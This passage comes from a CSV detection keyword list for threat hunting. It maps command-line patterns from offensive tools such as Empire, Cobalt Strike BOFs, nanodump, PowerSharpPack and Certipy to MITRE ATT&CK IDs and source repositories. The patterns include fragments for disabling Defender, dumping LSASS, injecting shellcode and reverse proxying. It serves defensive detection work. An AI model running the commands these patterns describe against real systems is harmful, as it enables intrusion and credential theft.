T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"* scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"* --script dns-srv-enum *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --script http-ntlm-info *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --script smb-enum-shares *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --script smb-security-mode*smb-enum-shares *","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"* --script smb-vuln-*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"* --script=http-ntlm-info --script-args=http-ntlm-info.root=*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","0","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" +"* --script=ldap-search -p *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --script=realvnc-auth-bypass *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --script=robots -z list*robots.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* --script-args dns-srv-enum.domain=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -ScriptString * -GetMinimallyObfuscated*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"* -ScriptString * -PSAmsiScanner *","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"* -seatbelt -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --seclogon-duplicate*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* SeriousSam.Execute *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"* --server * --type pass-pols*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" +"* server -p 80 --reverse --socks5*","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* server.py -s tornado --cert /*pem --key /*.pem*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"* -ServerUri * -FindAmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"* service -dump all-services.json*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* --service fortynorth*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -ServiceName * -PipeName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* servicetags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --session=allrules --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --set-as-owned smart -bp * kerberos * --kdc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* Set-MpPreference -DisableIOAVProtection *","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"* SetMzLogonPwd *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* set-objectowner * -target-sid * -owner-sid *","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"* setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"* -sgn -syscalls *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -sgn -unhook -antidebug *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* shadow auto -u * -p * -account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"* -SharpChromium *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpDPAPI -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"* -SharPersist *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" +"* -SharpShares *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpSniper *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* SharpSocks *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -SharpSpray *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpUp -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -Sharpview *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -sharpweb -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --shell tcsh exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --shellcode *","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"* --shellcode *--dc-ip *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* --shellcode *--silent*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* --shellcode --remoteinject*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* shodan-api.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --show passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --show_invalid_creds*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* --shtinkering*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* sigflip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.c *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching 